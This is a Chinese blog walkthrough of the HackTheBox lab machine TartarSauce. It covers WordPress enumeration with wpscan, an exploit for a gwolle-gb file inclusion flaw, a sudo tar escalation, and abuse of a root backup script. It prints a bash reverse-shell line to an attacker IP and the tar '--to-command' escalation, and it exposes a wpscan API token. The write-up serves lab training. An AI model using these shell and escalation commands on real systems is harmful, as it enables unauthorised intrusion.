No.131-HackTheBox-Linux-TartarSauce-Walkthrough渗透学习

**

HackTheBox-Linux-TartarSauce-Walkthrough

**

靶机地址：https://www.hackthebox.eu/home/machines/profile/138
靶机难度：中级（4.7/10）
靶机发布日期：2018年10月28日
靶机描述：
TartarSauce is a fairly challenging box that highlights the importance of a broad remote enumeration instead of focusing on obvious but potentially less fruitful attack vectors. It features a quite realistic privilege escalation requiring abuses of the tar command. Attention to detail when reviewing tool output is beneficial when attempting this machine.

作者：大余
时间：2020-06-10

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.88…

nmap扫描发现80端口上Apache存在几个子目录…

访问apache一瓶汽水…

经过直接对nmap发现的目录进行各种枚举…发现了/wp子目录…

访问后发现这是wordpress框架页面…404报错…遭到了破坏?上篇文章也遇到了，直接添加域名到hosts即可正常显示…

命令：wpscan --url http://10.10.10.88/webservices/wp --enumerate p --api-token kJ4bhZCgveCcoGJPER7AOsHJTeFDf90Wfj9zu0V6asc
wordpress直接利用wpscan进行渗透…可以看到开始是没有API…前往wpscan官网免费注册一天可以扫50次，获得API直接利用在继续…

发现gwolle-gb中存在远程文件包含漏洞…

查看EXP…下载下来…

阅读后利用EXP方法即可文件上传提权…

简单shell通过EXP上传访问，即可获得反向外壳…成功获得了www低权用户…
这里利用了gwolle漏洞提权…

命令：

echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.51/7777 0>&1' > dayu.sh
tar -cvf dayu.tar dayu.sh

权限很低，无法进入用户目录…
枚举发现sudo -l中以tar用户身份运行onuma可以提升到用户权限…

命令：sudo -u onuma tar -xvf dayu.tar --to-command /bin/bash
成功提升权限，获得了user_flag信息…

这里通过LinEnum枚举目前未发现可利用地方…
上传pspy监控进程看看…

发现每五分钟/usr/sbin/backuperer会自动以root权限执行…

查看backuperer内容得出：
1、会从/var/tmp和/var/tmp/check文件夹中删除带点文件？
2、会将/var/www/html用户onuma的内容压缩/存档到文件/var/tmp中，文件的名称以点名开头？
3、带点文件存在30秒。
4、会创建/var/tmp/check目录。
5、将先前解压的内容作为根提取到/var/tmp/check目录中。
6、diff对/var/www/htmlvs 进行对抗/var/tmp/check/var/www/html
目录中的文件会以root权限执行…
那这样可以抓住30秒时间，每到五分钟归零新一轮开始时开始计算30秒时间，当归零时会生成一个带点文件，30秒后会自动删除，期间如果是tar，会自动解压到check目录下…
只需要利用30秒时间插入个简单shell复制到带点文件，带点文件30秒后会自动解压shell到check目录下，就可以以root权限执行了，获得反弹外壳…开始

首先在本地按照backuperer脚本提示，还原方法创建了shell.tar文本…
将其上传到靶机/var/tmp目录下…

利用systemctl list-timers查看backuperer进程的运行时间…
等待LEFT倒计时归零时，ls -la在tmp目录下查看到带点的文件，cp刚上传的shell.tar到带点文件即可…

过10秒左右，脚本会自动解压到check目录，如果未生成check说明失败…检查前面操作…
在check下，查看到了shell具有root执行权限…

执行后获得了root权限，查看到了root_flag信息…

这台就不总结了，思路很好…加油

由于我们已经成功得到root权限查看user和root.txt，因此完成这台中级的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。